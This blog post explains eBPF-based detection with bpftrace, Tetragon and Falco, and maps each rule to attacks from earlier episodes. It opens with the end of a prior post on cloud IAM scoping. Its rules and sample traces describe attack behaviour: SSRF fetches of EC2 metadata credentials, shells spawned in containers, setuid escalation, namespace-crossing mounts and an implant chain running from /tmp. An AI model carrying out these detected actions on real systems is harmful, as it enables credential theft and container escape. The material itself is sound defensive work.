Dry-run a grant	`aws iam simulate-principal-policy`	`gcloud policy-troubleshoot iam`	`az deployment group what-if`
Guardrail	Permission boundary / SCP	Org Policy constraint	Azure Policy assignment
Recurring check	`aws accessanalyzer` unused-access findings	IAM Recommender	Access Reviews

Framework Alignment

Framework	Control / ID	Mapping
CISSP	Domain 5 — IAM	Least privilege enforced at initial provisioning, not discovered later through audit
CISSP	Domain 1 — Security & Risk Management	Provisional access as a risk-acceptance decision with an explicit review date
ISO 27001:2022	5.15 Access control	Access rights defined and scoped to business need at the point of grant
ISO 27001:2022	5.18 Access rights	Review of access rights — extended here to newly granted permissions, not just standing ones
SOC 2	CC6.1	Logical access controls restrict access to authorized users and processes from first grant
SOC 2	CC6.3	Access is modified or revoked based on a defined review cadence

Key Takeaways

New cloud service IAM permissions ship on the provider’s schedule, not yours — the checklist has to run the same way every time, not only when someone remembers
The fast path (service:* on *) is also the path to next year’s wildcard-debt finding — scope it once, at the point of grant, instead of unwinding it later
AWS, GCP, and Azure each expose a different tool for discovering exact actions — none of them is “read the whole service’s docs and guess”
A grant without a guardrail (permission boundary, SCP, Org Policy, Azure Policy) is one copy-paste away from becoming account-wide
Provisional access needs an expiration built in from day one — a 30-day calendar review, not a hope that someone runs the audit eventually

What’s Next

This series no longer has a fixed episode count. New cloud service IAM permissions arrive as a continuous stream across AWS, GCP, and Azure, and future episodes will cover them as they matter operationally rather than on a fixed syllabus.


Detection Engineering with eBPF: Kernel-Level Visibility for Cloud Incidents

July 6, 2026 by Vamshi Krishna Santhapuri

Reading Time: 13 minutes


TL;DR

Detection engineering with eBPF addresses OWASP A09 directly: most process-level attack techniques leave no trace in CloudTrail, VPC Flow Logs, or syslog — eBPF hooks in the kernel observe them before the attacker has any ability to suppress the record
CloudTrail is API-plane only; VPC Flow Logs are network-plane only, with an aggregation and delivery delay that can reach roughly 15 minutes and no process context; syslog captures only what userspace processes voluntarily emit. All three miss the OS-level attack surface entirely
eBPF attaches to kernel syscall tracepoints and kprobes to capture connect(), execve(), mount(), setuid(), and open() with full context: PID, process name, container cgroup, parent process, timestamp — in real time
Falco and Tetragon are the production-grade always-on options; bpftrace is the ad-hoc investigation tool — use each for what it is designed for
Tetragon’s TracingPolicy can kill a process at the moment of the violating syscall, before the attack completes — this is enforcement, not just alerting
Every attack in EP07 through EP10 has a detectable kernel-level signal; this episode maps each one to a concrete eBPF detection rule

OWASP Mapping: A09 Security Logging and Monitoring Failures — the structural gap this series has referenced from EP04 onward: attacks that succeed not because defenses are absent, but because the telemetry layer cannot see the OS surface where the attacks execute.

The Big Picture

┌─────────────────────────────────────────────────────────────────────────┐
│                  DETECTION ENGINEERING WITH eBPF                        │
│                                                                         │
│   KERNEL SPACE                          USERSPACE                       │
│                                                                         │
│   syscall/kprobe hooks                                                  │
│   ┌──────────────────┐                                                  │
│   │ connect()        │──▶ ring buffer ──▶ Tetragon ──▶ Hubble/SIEM     │
│   │ execve()         │                                                  │
│   │ mount()          │──▶ ring buffer ──▶ Falco   ──▶ Slack/PagerDuty │
│   │ setuid()         │                                                  │
│   │ open()           │──▶ perf buffer ──▶ bpftrace ──▶ stdout/log     │
│   └──────────────────┘                                                  │
│          │                                                              │
│          │  Context captured at hook:                                   │
│          │  PID · comm · cgroup (container ID) · args · timestamp      │
│          │  parent PID · network namespace · mount namespace           │
│                                                                         │
│   ═══════════════════════════════════════════════════════════           │
│   WHAT OTHER TOOLS SEE                                                  │
│   CloudTrail:     API calls only — nothing below the AWS SDK            │
│   VPC Flow Logs:  src/dst IP+port only — 15-min delay, no PID          │
│   Syslog:         What the process chose to log — attacker controls it  │
│   eBPF:           Every syscall — attacker cannot suppress it          │
│                   without kernel access                                 │
└─────────────────────────────────────────────────────────────────────────┘

Detection engineering with eBPF closes the observability gap that every previous episode in this series exploited. The SSRF in EP07 made an outbound connection to 169.254.169.254, the EC2 metadata endpoint, from a web application process. VPC Flow Logs never show it, because AWS excludes instance metadata traffic from flow logs. CloudTrail shows nothing. eBPF shows the connect() syscall with the PID, the process name, the container cgroup ID, and the timestamp, at the moment it occurs.

The Problem: Your SIEM Has a 15-Minute Hole

During a cloud incident response engagement, the question came up in the first hour: did this process make any outbound connections in the last 30 minutes?

Four telemetry sources, four answers:

CloudTrail: Not applicable. CloudTrail records AWS API calls. A process inside an EC2 instance making a raw TCP connection to an external IP — or to the metadata endpoint — is OS-level activity. CloudTrail has no record of it.

VPC Flow Logs: Maybe, eventually. Flow Logs aggregate at 1-minute or 10-minute intervals (configurable), then land in S3 or CloudWatch Logs with additional delay. In practice, you’re looking at 10–15 minutes before the data is queryable. The flow record contains source IP, destination IP, source port, destination port, protocol, bytes, packets, and nothing else. There is no PID. There is no process name. There is no indication of which container inside the EC2 instance made the connection. If ten pods are running on the same node, VPC Flow Logs tell you the node talked to an external IP. You don’t know which pod. Connections to the metadata endpoint are worse still: traffic to 169.254.169.254 is excluded from flow logs entirely.

Syslog: Nothing logged. The process — a compromised web application exploited via SSRF — didn’t log the connection. It wouldn’t. Application code doesn’t emit syslog entries for every outbound connection it makes. And an attacker controlling the process would not add logging.

eBPF connect hook: Every TCP connection attempt, captured at the connect() syscall or the kernel's tcp_connect function, with PID, process name, container cgroup ID, destination IP, destination port, source IP, and timestamp, in real time.

That is the gap. Everything in EP04 through EP10 of this series lived in it.

The OWASP A09 framing is exactly right: these are not failures of detection rules, they are failures of the telemetry layer. You cannot write a SIEM rule for data that is never collected. eBPF collects the data that the other layers structurally cannot.
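To make the flow-log limitation concrete, here is a minimal Python sketch that parses one record in the default (version 2) VPC Flow Logs format. The sample record, its ENI ID, and its addresses are invented for illustration; only the field order comes from the default format.

```python
# Field order of the default (version 2) VPC Flow Logs record format.
DEFAULT_FIELDS = (
    "version", "account_id", "interface_id", "srcaddr", "dstaddr",
    "srcport", "dstport", "protocol", "packets", "bytes",
    "start", "end", "action", "log_status",
)

# Fields an investigator would want but the record format does not carry.
PROCESS_CONTEXT = ("pid", "comm", "container_id")


def parse_flow_record(line: str) -> dict:
    """Split one space-separated default-format record into named fields."""
    values = line.split()
    if len(values) != len(DEFAULT_FIELDS):
        raise ValueError(
            f"expected {len(DEFAULT_FIELDS)} fields, got {len(values)}"
        )
    return dict(zip(DEFAULT_FIELDS, values))


# Hypothetical record: a node talking to an external address over TCP/443.
sample = (
    "2 111111111111 eni-0abc123 10.0.1.15 203.0.113.50 "
    "49152 443 6 10 840 1720000000 1720000060 ACCEPT OK"
)
record = parse_flow_record(sample)
available_context = [name for name in PROCESS_CONTEXT if name in record]

print("destination:", record["dstaddr"], "port:", record["dstport"])
print("process context fields present:", available_context)
```

The second print shows an empty list: whatever rule you write on top of this record, it has no process or container field to match on.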

What eBPF Detects That Other Tools Miss

Technique	CloudTrail	VPC Flow Logs	Syslog	eBPF
Process spawn inside container	No	No	Maybe (if auditd configured)	Yes — execve(): PID, command, args, parent PID, container cgroup
Outbound TCP connection	No	IP+port, 15-min delay, no PID	No	connect(): IP+port+PID+comm+container, real-time
File write to /etc/passwd	No	No	No	openat()+write(): exact path, PID, comm, container
Privilege escalation (setuid/setgid)	No	No	Maybe (auditd)	Yes — setuid() syscall args: target UID, calling PID, comm
Container escape attempt via mount	No	No	No	mount(): args, mount namespace ID, calling PID — namespace mismatch detectable
SSRF to 169.254.169.254	No	No (instance metadata traffic is excluded from flow logs)	No	connect() from app process to metadata IP: PID, comm, container, real-time
Binary execution with unusual parent	No	No	No	execve(): full parent chain — detects shell spawned from web process
Kubernetes secret file read	No	No	No	openat() on /run/secrets/kubernetes.io/serviceaccount/token
STS credential fetch from Lambda	No	Endpoint IP only	No	connect() to sts.amazonaws.com from unexpected process

The pattern across the table is consistent: CloudTrail covers the AWS control plane. VPC Flow Logs cover the network plane with delay and no process context. Syslog covers what processes choose to emit. eBPF covers the syscall surface — the layer where every one of these events must pass, regardless of what the attacker wants.

For operators not writing eBPF: This table tells you what your current SIEM can and cannot see. If your threat model includes container escapes, SSRF-to-metadata attacks, or post-compromise lateral movement through process execution, the detection signal for those techniques does not exist in your CloudTrail or your flow logs. It exists only at the kernel level.

Detection Rule 1: Unexpected Outbound from an Application Container

The SSRF attack in EP07 — and the lateral movement in EP10 — both required an outbound TCP connection from a process that had no legitimate reason to make one. This is the detection.

Ad-hoc investigation with bpftrace

When you’re on a node right now and need to know what’s connecting outbound:

# Shows PID, process name, and destination IP in real time
# Run on the node (requires root or CAP_BPF)
bpftrace -e '
#include <linux/socket.h>
#include <linux/in.h>

tracepoint:syscalls:sys_enter_connect {
  $sa = (struct sockaddr_in *)args->uservaddr;
  if ($sa->sin_family == AF_INET) {
    printf("connect: pid=%-6d comm=%-20s dst=%s:%d\n",
           pid,
           comm,
           ntop($sa->sin_addr.s_addr),
           (uint16)bswap($sa->sin_port));
  }
}
'

Sample output — what you’d see during an SSRF exploit targeting the EC2 metadata service:

connect: pid=18422  comm=python3              dst=169.254.169.254:80
connect: pid=18422  comm=python3              dst=169.254.169.254:80
connect: pid=18432  comm=curl                 dst=169.254.169.254:80

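The python3 process, your web application, is connecting to 169.254.169.254, the metadata endpoint. Unless the application is expected to fetch instance-role credentials itself, that is not a legitimate application dependency, and a curl process hitting the same address strengthens the case. That’s the SSRF signal.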
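If you capture the bpftrace output to a file during an investigation, a few lines of Python can pull out the metadata-endpoint hits. This is a sketch that assumes the exact printf format used in the one-liner above; the sshd line in the sample is invented to show a non-matching connection.

```python
import re

IMDS_ADDR = "169.254.169.254"
# Matches the printf format of the bpftrace one-liner above.
LINE_RE = re.compile(r"connect: pid=(\d+)\s+comm=(\S+)\s+dst=([\d.]+):(\d+)")


def imds_connections(lines):
    """Return (pid, comm) for every connect() aimed at the metadata IP."""
    hits = []
    for line in lines:
        match = LINE_RE.search(line)
        if match and match.group(3) == IMDS_ADDR:
            hits.append((int(match.group(1)), match.group(2)))
    return hits


sample_output = """\
connect: pid=18422  comm=python3              dst=169.254.169.254:80
connect: pid=18422  comm=python3              dst=169.254.169.254:80
connect: pid=18432  comm=curl                 dst=169.254.169.254:80
connect: pid=901    comm=sshd                 dst=10.0.1.20:22
""".splitlines()

# De-duplicate so each offending process is reported once.
for pid, comm in sorted(set(imds_connections(sample_output))):
    print(f"IMDS access: pid={pid} comm={comm}")
```

Keeping the parser separate from the trace means the same capture can be re-examined later for other destinations without re-running bpftrace on the node.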

bpftrace — kernel answers in one line goes deep on the tracepoint/kprobe model and how to filter by cgroup for container-specific traces. The one-liners above are the starting point; that post covers building targeted investigation scripts.

Production-grade enforcement with Tetragon

bpftrace is for investigation. Tetragon is for always-on detection — and optionally, prevention.

# TracingPolicy: alert on outbound connections from non-host network namespaces
# (any container making outbound TCP connections)
apiVersion: cilium.io/v1alpha1
kind: TracingPolicy
metadata:
  name: "detect-outbound-connections"
spec:
  kprobes:
  - call: "tcp_connect"
    syscall: false
    args:
    - index: 0
      type: "sock"
    selectors:
    - matchNamespaces:
      - namespace: Net
        operator: NotIn
        values:
        - "host_ns"
      matchActions:
      - action: Post   # Generate an alert event; change to Sigkill to prevent

To detect specifically the SSRF-to-metadata pattern — connections to 169.254.169.254:

apiVersion: cilium.io/v1alpha1
kind: TracingPolicy
metadata:
  name: "detect-imds-access"
spec:
  kprobes:
  - call: "tcp_connect"
    syscall: false
    args:
    - index: 0
      type: "sock"
    selectors:
    - matchArgs:
      - index: 0
        operator: "DAddr"       # match on the socket's destination address
        values:
        - "169.254.169.254/32"
      matchActions:
      - action: Post
        rateLimit: "1m"         # at most one event per minute per matching key

Tetragon events include process_kprobe JSON with the pod name, namespace, container ID, binary path, parent binary, and all arguments. This feeds directly into your SIEM or to Hubble’s flow log.
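For triage, you usually want only a handful of those fields. The sketch below reduces one JSON event line to a flat summary. The nesting it reads (process_kprobe → process → pod, plus parent and function_name) is my assumption about the exported event shape, and the sample event is hand-written rather than captured from a cluster, so verify the keys against your own Tetragon export before relying on it.

```python
import json


def summarize_kprobe(raw_line: str):
    """Pull triage fields out of one Tetragon JSON event line.

    Returns None for events that are not process_kprobe events.
    """
    event = json.loads(raw_line)
    kprobe = event.get("process_kprobe")
    if kprobe is None:
        return None
    process = kprobe.get("process", {})
    pod = process.get("pod", {})
    return {
        "function": kprobe.get("function_name"),
        "binary": process.get("binary"),
        "parent_binary": kprobe.get("parent", {}).get("binary"),
        "pod": pod.get("name"),
        "namespace": pod.get("namespace"),
        "time": event.get("time"),
    }


# Hand-written event for illustration only (assumed field layout).
sample_event = json.dumps({
    "process_kprobe": {
        "process": {
            "binary": "/usr/bin/curl",
            "pod": {"namespace": "shop", "name": "web-7d9f"},
        },
        "parent": {"binary": "/usr/bin/python3"},
        "function_name": "tcp_connect",
    },
    "time": "2026-07-06T02:47:00Z",
})

summary = summarize_kprobe(sample_event)
print(summary)
```

Missing keys come back as None instead of raising, which suits a triage script that has to survive events from mixed policy types.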

Detection Rule 2: Process Execution Inside a Container

A shell spawning inside a container that has no business running a shell is a post-compromise indicator. It covers the container escape setup from EP08, the supply chain implant from EP09, and any hands-on-keyboard phase after initial access.

Falco rule: shell spawned from application container

# Falco rule: detect any shell spawned in a container
# Add to /etc/falco/rules.d/purple-team.yaml
- list: shell_binaries
  items: [bash, sh, zsh, ksh, fish, tcsh, csh, dash]

- list: allowed_shell_images
  items: [
    "debug-tools",     # Your approved debug container image names
    "toolbox"
  ]

- rule: Shell Spawned in Container
  desc: >
    A shell was spawned inside a container. In application containers (web servers,
    APIs, data processors) this is almost always a post-compromise indicator.
  condition: >
    evt.type = execve and
    evt.dir = < and
    container and
    container.image.repository != "" and
    proc.name in (shell_binaries) and
    not proc.pname in (shell_binaries) and
    not container.image.repository in (allowed_shell_images) and
    not k8s.ns.name in (kube-system, kube-public)
  output: >
    Shell spawned in container
    (user=%user.name
     container=%container.name
     image=%container.image.repository
     cmd=%proc.cmdline
     parent=%proc.pname
     pod=%k8s.pod.name
     ns=%k8s.ns.name)
  priority: WARNING
  tags: [purple-team, post-compromise, container]

The proc.pname condition is the key signal: a shell spawned by a web server process (nginx, node, gunicorn, java) is a different threat than a shell spawned by another shell in a debug context. The rule above passes the second case through the not proc.pname in (shell_binaries) clause and exempts approved debug images through the allowed_shell_images exclusion; it flags the first.
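Before loading a rule like this, it can help to reason through its boolean logic with a few concrete cases. The following Python sketch mirrors the condition of the rule above as a plain function; it is a model for thinking about exclusions, not a substitute for Falco's own rule engine, and the image and namespace names in the cases are invented.

```python
SHELL_BINARIES = {"bash", "sh", "zsh", "ksh", "fish", "tcsh", "csh", "dash"}
ALLOWED_SHELL_IMAGES = {"debug-tools", "toolbox"}
EXCLUDED_NAMESPACES = {"kube-system", "kube-public"}


def shell_rule_fires(proc_name, parent_name, image_repo, namespace):
    """Mirror the rule's condition for one execve inside a container."""
    return (
        image_repo != ""                          # image metadata resolved
        and proc_name in SHELL_BINARIES           # a shell was executed
        and parent_name not in SHELL_BINARIES     # not a shell-from-shell
        and image_repo not in ALLOWED_SHELL_IMAGES
        and namespace not in EXCLUDED_NAMESPACES
    )


# (description, proc, parent, image, namespace), all hypothetical.
cases = [
    ("web server spawns sh", "sh", "nginx", "shop/web", "prod"),
    ("shell spawns shell", "bash", "bash", "shop/web", "prod"),
    ("approved debug image", "sh", "node", "debug-tools", "prod"),
    ("system namespace", "sh", "node", "shop/web", "kube-system"),
]
for description, *fields in cases:
    print(f"{description:24s} -> alert={shell_rule_fires(*fields)}")
```

Only the first case alerts. Writing the cases down this way also documents which exclusion is responsible for each suppressed alert.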

Detecting the supply chain implant pattern

EP09 covered supply chain attacks where a build artifact executes unexpected binaries at runtime. The bpftrace version for ad-hoc investigation of what a specific container is executing:

# bpftrace: trace execve() calls from processes inside a specific container
# First, find the container's cgroup path:
# systemd-cgls | grep <pod-name>
# Or: cat /proc/<container-pid>/cgroup
# Then substitute it for <cgroup-path> in the filter below

bpftrace -e '
tracepoint:syscalls:sys_enter_execve
/cgroup == cgroupid("/sys/fs/cgroup/unified/<cgroup-path>")/
{
  printf("execve: pid=%-6d ppid=%-6d comm=%-20s file=%s\n",
         pid,
         curtask->real_parent->tgid,
         comm,
         str(args->filename));
}
' 2>/dev/null | grep -v "^\[" | head -50

Sample output during a supply chain compromise scenario — unexpected binary execution from a package manager implant:

execve: pid=31204  ppid=31190  comm=node                 file=/bin/sh
execve: pid=31205  ppid=31204  comm=sh                   file=/tmp/.x/beacon
execve: pid=31206  ppid=31205  comm=beacon               file=/usr/bin/curl

The chain node → sh → /tmp/.x/beacon → curl — application process spawning a shell, which executes an unknown binary from /tmp, which runs curl — is the supply chain implant execution pattern. None of this appears in CloudTrail.
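Reading that chain by eye works for three lines; for a longer capture, the parent links can be followed programmatically. The sketch below assumes the printf format of the bpftrace script above and relies on the fact that comm at sys_enter_execve is still the caller's name from before the exec. The list of suspect directories is my own assumption, not something the tooling defines.

```python
import re

EXEC_RE = re.compile(
    r"execve: pid=(\d+)\s+ppid=(\d+)\s+comm=(\S+)\s+file=(\S+)"
)
# Assumed watch list of world-writable directories; adjust to taste.
SUSPECT_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")


def parse_execs(lines):
    """Map pid -> (ppid, comm, file) for every execve line in the trace."""
    execs = {}
    for line in lines:
        match = EXEC_RE.search(line)
        if match:
            pid, ppid, comm, path = match.groups()
            execs[int(pid)] = (int(ppid), comm, path)
    return execs


def exec_chain(execs, pid):
    """Walk ppid links upward; return [root comm, oldest file, ..., newest]."""
    files, root_comm, seen = [], None, set()
    while pid in execs and pid not in seen:
        seen.add(pid)
        ppid, comm, path = execs[pid]
        files.append(path)
        root_comm = comm  # comm of the topmost traced caller
        pid = ppid
    return [root_comm] + files[::-1] if files else []


def is_suspicious(chain):
    """True when any executed file lives under a suspect directory."""
    return any(path.startswith(SUSPECT_DIRS) for path in chain[1:])


trace = [
    "execve: pid=31204  ppid=31190  comm=node                 file=/bin/sh",
    "execve: pid=31205  ppid=31204  comm=sh                   file=/tmp/.x/beacon",
    "execve: pid=31206  ppid=31205  comm=beacon               file=/usr/bin/curl",
]
execs = parse_execs(trace)
chain = exec_chain(execs, 31206)
print(" → ".join(chain), "| suspicious:", is_suspicious(chain))
```

A PID that calls execve more than once overwrites its earlier entry here, which is acceptable for a short incident capture but would need a list per PID in anything longer-running.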

Detection Rule 3: Privilege Escalation — setuid(0) and Capability Abuse

A process calling setuid(0) to elevate to root, or setcap to acquire new capabilities, is a privilege escalation indicator. The EP08 container escape path used a setuid binary to gain root inside the container as the first step toward escaping the namespace.

bpftrace: catch setuid(0) calls in real time

# bpftrace: alert on any process calling setuid(0)
# Any process attempting to switch to UID 0
bpftrace -e '
tracepoint:syscalls:sys_enter_setuid {
  if (args->uid == 0) {
    printf("ALERT setuid(0): pid=%-6d comm=%-20s ppid=%d pcomm=%s\n",
           pid,
           comm,
           curtask->real_parent->tgid,
           str(curtask->real_parent->comm));
  }
}
tracepoint:syscalls:sys_enter_setresuid {
  if (args->ruid == 0 || args->euid == 0) {
    printf("ALERT setresuid(root): pid=%-6d comm=%-20s\n", pid, comm);
  }
}
'

Falco rule: setuid binary execution inside container

- rule: Setuid Binary Executed in Container
  desc: >
    A setuid binary was executed inside a container. Setuid binaries inside
    containers are a privilege escalation path — they run as root regardless
    of the container's user setting.
  condition: >
    evt.type = execve and
    evt.dir = < and
    container and
    proc.is_suid_exe = true
  output: >
    Setuid binary executed in container
    (binary=%proc.exepath
     user=%user.name
     container=%container.name
     pod=%k8s.pod.name
     cmd=%proc.cmdline)
  priority: ERROR
  tags: [purple-team, privilege-escalation, container]

Detection Rule 4: Container Escape Attempt via Namespace-Crossing Mount

The privileged container escape path from EP08 requires calling mount() from a container namespace to access the host filesystem. The kernel records the mount namespace of the calling process — an eBPF kprobe on mount() can detect when the caller’s mount namespace differs from the host namespace.

Tetragon policy: kill any mount from a non-host namespace

# This covers the --privileged container escape path documented in EP08
# The mount() call that crosses from container namespace to host filesystem
apiVersion: cilium.io/v1alpha1
kind: TracingPolicy
metadata:
  name: "detect-container-mount-escape"
spec:
  kprobes:
  - call: "security_sb_mount"
    syscall: false
    args:
    - index: 0
      type: "string"     # dev_name
    - index: 3
      type: "uint64"     # mount flags (unsigned long, not a string)
    selectors:
    - matchNamespaces:
      - namespace: Mnt
        operator: NotIn
        values:
        - "host_ns"
      matchArgs:
      - index: 0
        operator: "NotEqual"
        values:
        - "proc"
        - "sysfs"
        - "tmpfs"        # Common legitimate mounts in containers
      matchActions:
      - action: Sigkill  # rateLimit applies to Post events, so it is omitted here

Start with action: Post and tune the exclusions for your environment before switching to Sigkill. See the production gotchas below.

bpftrace: ad-hoc namespace crossing investigation

# bpftrace: trace mount() calls and show the mount namespace of the caller
# Mount namespace ID of the host: read from /proc/1/ns/mnt
HOST_MNT_NS=$(readlink /proc/1/ns/mnt | grep -oP '\d+')

bpftrace -e '
#include <linux/nsproxy.h>
#include <linux/mount.h>

kprobe:__x64_sys_mount {
  $nsproxy = (struct nsproxy *)curtask->nsproxy;
  $mnt_ns_id = $nsproxy->mnt_ns->ns.inum;
  printf("mount: pid=%-6d comm=%-20s mnt_ns=%u\n",
         pid, comm, $mnt_ns_id);
}
' 2>/dev/null

Compare the mnt_ns value in the output against $HOST_MNT_NS. Any mount call with a different mnt_ns value comes from a process in its own mount namespace, which on a Kubernetes node usually means a container. A privileged container attempting host filesystem access shows up with its container namespace ID.
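That comparison is easy to script once the trace is saved. A minimal sketch, assuming the printf format of the bpftrace script above; the namespace inode numbers and the two trace lines are invented for illustration.

```python
import re

MOUNT_RE = re.compile(r"mount: pid=(\d+)\s+comm=(\S+)\s+mnt_ns=(\d+)")


def ns_inode(link_target: str) -> int:
    """Extract the inode from a namespace link such as 'mnt:[4026531840]'."""
    match = re.fullmatch(r"\w+:\[(\d+)\]", link_target.strip())
    if match is None:
        raise ValueError(f"not a namespace link: {link_target!r}")
    return int(match.group(1))


def foreign_mounts(lines, host_ns):
    """Return (pid, comm, mnt_ns) for mount calls outside the host namespace."""
    hits = []
    for line in lines:
        match = MOUNT_RE.search(line)
        if match and int(match.group(3)) != host_ns:
            hits.append(
                (int(match.group(1)), match.group(2), int(match.group(3)))
            )
    return hits


# On a live node you would use: ns_inode(os.readlink("/proc/1/ns/mnt"))
host_ns = ns_inode("mnt:[4026531840]")  # hypothetical host value
trace = [
    "mount: pid=1      comm=systemd              mnt_ns=4026531840",
    "mount: pid=7731   comm=sh                   mnt_ns=4026532589",
]
suspects = foreign_mounts(trace, host_ns)
print(suspects)
```

Only the sh process is reported. On a real node, expect some legitimate entries here as well, which is the same tuning problem the Tetragon exclusions address.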

Building a Detection Pipeline

Ad-hoc bpftrace commands answer questions during an incident. Always-on detection requires a pipeline that runs continuously, routes alerts to a durable destination, and survives pod restarts. The two production-grade options in this stack:

eBPF hooks
    │
    ├── Tetragon (always-on, Kubernetes-native)
    │       └── TracingPolicy CRDs
    │               └── JSON events → Hubble → Grafana
    │                               → SIEM (Splunk/Elastic)
    │                               → PagerDuty
    │
    └── Falco (rule-based, declarative)
            └── /etc/falco/rules.d/*.yaml
                    └── falcosidekick
                            ├── Slack
                            ├── PagerDuty
                            ├── Elasticsearch
                            └── AWS Lambda (custom response)

The TC eBPF pod-level network policy post covers how Cilium and Tetragon share the same underlying kernel attachment points — understanding TC hooks helps explain why Tetragon’s network-level policies fire at the same layer as Cilium’s NetworkPolicy enforcement.

Falco with falcosidekick: complete local testing setup

Use this to validate your Falco rules before deploying to a cluster. It routes Falco alerts to Slack in real time.

# docker-compose.yml — local Falco + falcosidekick testing
# Requires: Docker with kernel headers or eBPF driver support
version: "3.8"

services:
  falco:
    image: falcosecurity/falco-no-driver:latest
    privileged: true
    volumes:
      - /var/run/docker.sock:/host/var/run/docker.sock
      - /dev:/host/dev
      - /proc:/host/proc:ro
      - /boot:/host/boot:ro
      - /lib/modules:/host/lib/modules:ro
      - /usr:/host/usr:ro
      - /etc/falco:/etc/falco
      - ./rules:/etc/falco/rules.d:ro
    depends_on:
      - falcosidekick
    # Falco pushes JSON alerts to falcosidekick over HTTP (it listens on 2801)
    command: >
      /usr/bin/falco
        -o "engine.kind=modern_ebpf"
        -o "json_output=true"
        -o "http_output.enabled=true"
        -o "http_output.url=http://falcosidekick:2801/"

  falcosidekick:
    image: falcosecurity/falcosidekick:latest
    environment:
      SLACK_WEBHOOKURL: "${SLACK_WEBHOOK}"
      SLACK_MINIMUMPRIORITY: "warning"
      # Output field keys contain dots, so they need the template index function
      SLACK_MESSAGEFORMAT: >
        [{{.Priority}}] {{.Rule}}
        | pod={{index .OutputFields "k8s.pod.name"}}
        | ns={{index .OutputFields "k8s.ns.name"}}
        | cmd={{index .OutputFields "proc.cmdline"}}
    ports:
      - "2801:2801"

# Start the stack (set SLACK_WEBHOOK first)
export SLACK_WEBHOOK="https://hooks.slack.com/services/YOUR/WEBHOOK/URL"
docker compose up -d

# Trigger a test alert: exec into any running container
docker exec -it <any-container> /bin/sh

# Check falcosidekick received it
curl -s http://localhost:2801/metrics | grep falcosidekick_inputs

Deploying Falco to Kubernetes with Helm

# Add Falco Helm repo
helm repo add falcosecurity https://falcosecurity.github.io/charts
helm repo update

# Install Falco with eBPF driver (not kernel module — required in Kubernetes)
helm install falco falcosecurity/falco \
  --namespace falco \
  --create-namespace \
  --set driver.kind=modern_ebpf \
  --set falcosidekick.enabled=true \
  --set falcosidekick.config.slack.webhookurl="${SLACK_WEBHOOK}" \
  --set falcosidekick.config.slack.minimumpriority=warning \
  --set-file customRules."purple-team\.yaml"=./rules/purple-team.yaml

# Verify Falco pods are running on all nodes
kubectl get pods -n falco -o wide

# Tail Falco logs from the Falco pods (add a pod name to follow a single node)
kubectl logs -n falco -l app.kubernetes.io/name=falco -f

# Validate a specific rule is loaded
kubectl exec -n falco <falco-pod> -- falco -L 2>/dev/null | grep "Shell Spawned"

What This Means for Each Prior Attack

Every attack in EP07 through EP10 had a detectable kernel-level signal that the standard telemetry stack missed. Here’s the detection mapping:

Episode	Attack	What Standard Telemetry Missed	eBPF Detection Signal
EP07	SSRF to EC2 IMDS	CloudTrail: nothing. VPC Flow Logs: nothing, because instance metadata traffic is excluded from flow logs	kprobe: tcp_connect to 169.254.169.254 from app process, with PID, comm, container, real-time
EP08	Container escape via privileged mount	CloudTrail: nothing. Syslog: nothing	kprobe: security_sb_mount() from non-host mount namespace; the namespace ID mismatch fires the alert
EP09	Supply chain implant execution	CloudTrail: nothing (OS-level). GuardDuty: maybe if beacon calls AWS APIs	kprobe: execve() with anomalous parent chain: web process → shell → unknown binary from /tmp
EP10	Lateral movement via cross-account role chaining	CloudTrail: AssumeRole events present but no process context	kprobe: tcp_connect to the sts.amazonaws.com endpoint from the Lambda handler process, an unexpected process identity

The table is not theoretical. It reflects what you would actually observe running these detection rules against the attack simulations in those episodes.

For the SSRF case (EP07): the connection to 169.254.169.254 from the web application process would fire within milliseconds of the exploit. VPC Flow Logs would never record it, because instance metadata traffic is excluded from flow logs, and even ordinary flows arrive 10–15 minutes late with no information about which process made them. By that time, the attacker has the IAM credentials and may have made subsequent API calls in a different region.

For the container escape (EP08): the mount() from a non-host mount namespace is the earliest detectable signal of the escape attempt. It fires before the attacker has host filesystem access. With action: Sigkill in the Tetragon policy, the process is terminated at this syscall — the escape does not complete.

⚠ Production Gotchas

Use the eBPF driver for Falco in Kubernetes, not the kernel module. The kernel module driver has to be built and loaded on every node, which creates a dependency on kernel headers being present and compatible. The modern_ebpf driver (Falco 0.35+) uses BTF and CO-RE: it works on kernels 5.8+ without kernel module installation and survives kernel upgrades. In managed Kubernetes (EKS, GKE, AKS), the kernel module path often doesn’t work at all due to the OS image restrictions.

Test Tetragon’s Sigkill action exhaustively before enabling it in production. The Sigkill action terminates the process at the moment of the violating syscall — before it completes. This is powerful for prevention but catastrophic if your exclusions are wrong. Common false positive sources: debug containers (kubectl debug), init containers that perform legitimate mounts, Kubernetes admission webhooks calling shell scripts. Always deploy with action: Post first, tune for two weeks of normal traffic, then switch to Sigkill only on rules with zero false positives in your environment.
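During the two-week observation window, the useful question is which binaries and namespaces each policy is firing on. The sketch below tallies exported JSON events by policy, binary, and namespace so the noisiest sources surface first. It assumes each process_kprobe event carries a policy_name field and the process/pod nesting shown; both are assumptions to check against your own export, and the sample events are hand-written.

```python
import json
from collections import Counter


def tally_post_events(lines):
    """Count process_kprobe events per (policy, binary, namespace)."""
    counts = Counter()
    for line in lines:
        line = line.strip()
        if not line:
            continue
        kprobe = json.loads(line).get("process_kprobe")
        if kprobe is None:
            continue  # skip exec/exit events
        process = kprobe.get("process", {})
        key = (
            kprobe.get("policy_name", "unknown"),
            process.get("binary", "unknown"),
            process.get("pod", {}).get("namespace", "host"),
        )
        counts[key] += 1
    return counts


def make_event(policy, binary, namespace):
    """Build a hand-written sample event (assumed field layout)."""
    return json.dumps({"process_kprobe": {
        "policy_name": policy,
        "process": {"binary": binary, "pod": {"namespace": namespace}},
    }})


observed = [
    make_event("detect-container-mount-escape", "/usr/bin/mount", "ci"),
    make_event("detect-container-mount-escape", "/usr/bin/mount", "ci"),
    make_event("detect-container-mount-escape", "/bin/busybox", "shop"),
    json.dumps({"process_exec": {"process": {"binary": "/bin/ls"}}}),
]
counts = tally_post_events(observed)
for (policy, binary, namespace), n in counts.most_common():
    print(f"{n:4d}  {policy}  {binary}  ns={namespace}")
```

Each line of the report is a candidate for either an exclusion or an investigation; a policy is ready for Sigkill only when every remaining line is something you would want killed.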

bpftrace is an investigation tool, not a production detector. bpftrace compiles and loads an eBPF program per invocation: it has no persistence, no alerting, and no output routing to your SIEM. It also cannot look backward. For the question from the opening, “did this process make outbound connections in the last 30 minutes?”, it can only show what the process does from the moment you attach. For always-on detection with history, use Tetragon or Falco. Running bpftrace as a daemon substitute introduces overhead without the management plane that production tools provide.

